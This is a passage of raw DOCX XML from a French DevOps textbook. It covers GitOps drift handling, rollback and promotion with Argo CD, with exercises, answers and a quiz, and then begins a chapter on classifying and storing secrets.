              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ressource modifiée à la main</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Intervention urgente</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Annuler ou intégrer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Ressource ajoutée hors Git</w:t>
            </w:r>
          </w:p>
        </w:tc>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Script oublié</w:t>
            </w:r>
          </w:p>
        </w:tc>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Supprimer ou codifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image mise à jour</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Déploiement manuel</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Écraser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Secret modifié</w:t>
            </w:r>
          </w:p>
        </w:tc>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Rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>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Externaliser le secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux retours arrière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Retour arrière par Git : le seul moyen propre</w:t>
        <w:br/>
        <w:t>git revert --no-edit 3f2a1c9</w:t>
        <w:br/>
        <w:t>git push</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ou revenir à une révision antérieure de l'application</w:t>
        <w:br/>
        <w:t>argocd app rollback boutique-production 12</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier que l'état correspond à nouveau</w:t>
        <w:br/>
        <w:t>argocd app get boutique-production --show-operation</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`PRUNE` SUPPRIME, Y COMPRIS LES VOLUMES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une ressource retirée du dépôt est supprimée du cluster. Sur un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PersistentVolumeClaim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, cela peut signifier une perte de données. Protégez les ressources critiques par des annotations et une politique de rétention.</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ADOPTER LE GITOPS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 dépôt de déploiement séparé du code applicatif.</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 agent installé et surveillé.</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Des environnements représentés par des surcouches.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Une promotion par demande de fusion.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Une alerte sur l'état de synchronisation.</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GitOps suppose un agent qui réconcilie en continu.</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déclaratif, le versionnement, le tirage et la réconciliation forment le socle.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Argo CD décrit des applications, Flux des sources et des personnalisations.</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selfHeal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> corrige les modifications manuelles.</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prune</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> supprime les ressources retirées du dépôt.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dépôt de déploiement est distinct du dépôt applicatif.</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promotion est une demande de fusion.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xml:space="preserve">Le retour arrière se fait par Git, pas par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>kubectl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'état converge. Reste à protéger ce qu'il contient : les secrets, puis à l'observer.</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81.1 — Déclarer une application Argo CD</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Une application doit se synchroniser automatiquement.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Associez dépôt et chemin.</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 xml:space="preserve">Activez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prune</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>selfHeal</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Limitez les réessais.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 81.2 — Gérer une dérive</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Un ingénieur a modifié le nombre de réplicas à la main.</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Constatez l'écart.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Décidez du traitement.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Rétablissez la convergence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 81.3 — Préparer une promotion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La version 1.4.2 doit passer de recette à production.</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Vérifiez l'image.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Modifiez la surcouche de production.</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Fusionnez après revue.</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81.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apiVersion: argoproj.io/v1alpha1</w:t>
        <w:br/>
        <w:t>kind: Application</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: boutique-production</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: argocd</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  source:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    repoURL: https://github.com/org/deploiement.git</w:t>
        <w:br/>
        <w:t xml:space="preserve">    targetRevision: main</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path: environnements/production/boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">  destination:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server: https://kubernetes.default.svc</w:t>
        <w:br/>
        <w:t xml:space="preserve">    namespace: boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">  syncPolicy:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    automated:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      prune: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">      selfHeal: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    retry:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      limit: 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">      backoff: { duration: 10s, factor: 2, maxDuration: 3m }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prune</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>selfHeal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> donnent la convergence complète, avec les risques associés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une limite de réessais évite de boucler indéfiniment sur une erreur de manifeste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 81.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Constat</w:t>
        <w:br/>
        <w:t>kubectl get deployment boutique -n production \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -o jsonpath='{.spec.replicas}'   # 5</w:t>
        <w:br/>
        <w:t>grep -A2 replicas environnements/production/boutique/kustomization.yaml</w:t>
        <w:br/>
        <w:t># count: 3</w:t>
        <w:br/>
        <w:br/>
        <w:t># Décision : l'augmentation était temporaire</w:t>
        <w:br/>
        <w:t># Git est la source de vérité → laisser selfHeal corriger</w:t>
        <w:br/>
        <w:t>argocd app diff boutique-production</w:t>
        <w:br/>
        <w:t>argocd app sync boutique-production</w:t>
        <w:br/>
        <w:br/>
        <w:t># Si l'augmentation devait être permanente :</w:t>
        <w:br/>
        <w:t># modifier kustomization.yaml et fusionner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La question n'est pas « qui a raison ? » mais « où est la source de vérité ? ».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>selfHeal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> corrige automatiquement en quelques minutes ; la synchronisation manuelle accélère.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 81.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># environnements/production/boutique/kustomization.yaml</w:t>
        <w:br/>
        <w:t>images:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: registry.exemple.fr/boutique</w:t>
        <w:br/>
        <w:t xml:space="preserve">    newTag: "1.4.2"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérification avant fusion</w:t>
        <w:br/>
        <w:t># cosign verify --key cosign.pub registry.exemple.fr/boutique:1.4.2</w:t>
        <w:br/>
        <w:t># argocd app diff boutique-production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une promotion est un changement de version dans un fichier, relu comme du code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La vérification de signature et le diff précèdent la fusion.</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 principe distingue GitOps d'un simple déploiement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Le YAML</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La réconciliation continue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Kubernetes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 dépôt</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>selfHeal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans Argo CD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Redémarre les pods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Corrige les modifications manuelles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Supprime les volumes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Met à jour l'image</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prune</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Compresse les manifestes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Supprime les ressources retirées de Git</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Réduit les réplicas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Nettoie les journaux</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Où se décide une promotion GitOps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 xml:space="preserve">Dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>kubectl</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Dans une demande de fusion</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Dans Argo CD</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Dans le registre</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Comment revenir à une version précédente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kubectl rollout undo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> seul</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 xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>git revert</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Redémarrer les pods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Supprimer le cluster</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L'agent corrige les écarts en continu.</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L'état déclaré reprend le dessus sur les modifications manuelles.</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C'est une suppression réelle, à utiliser avec précaution.</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La promotion est un changement versionné et relu.</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Le retour arrière passe par Git pour rester convergent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>82. Gestion des secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stocker, distribuer et faire tourner les informations sensibles sans les laisser traîner dans un dépôt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Avancé · Prérequis : chapitre 81</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Distinguer un secret d'une configuration.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Choisir entre coffre, scellement et chiffrement de dépôt.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Brancher un secret dans un conteneur.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Organiser la rotation.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Détecter une fuite et réagir.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>82.1 Ce qui est secret, ce qui ne l'est pas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un secret est une valeur dont la divulgation permet d'agir : mot de passe, clé d'API, certificat privé, jeton. Une configuration est une valeur dont la divulgation est sans conséquence : nom d'hôte, niveau de journalisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.312 — Six valeurs classées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29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Valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Nature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Emplacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mot de passe de base</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Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coffre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="329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Clé d'API tierce</w:t>
            </w:r>
          </w:p>
        </w:tc>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Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Coffre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nom de domaine</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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="329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Niveau de journalisation</w:t>
            </w:r>
          </w:p>
        </w:tc>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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Certificat public</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Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="329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Clé privée TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>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Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Coffre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UN SECRET DANS GIT RESTE DANS L'HISTORIQUE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Supprimer un fichier ne supprime pas son contenu : il reste dans les commits antérieurs, dans les caches d'interface et dans les clones. La seule réaction valable est de révoquer la valeur et d'en émettre une nouvelle.</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ROTATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Remplacement périodique d'un secret par une nouvelle valeur, avec une période de recouvrement pendant laquelle les deux valeurs sont acceptées.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
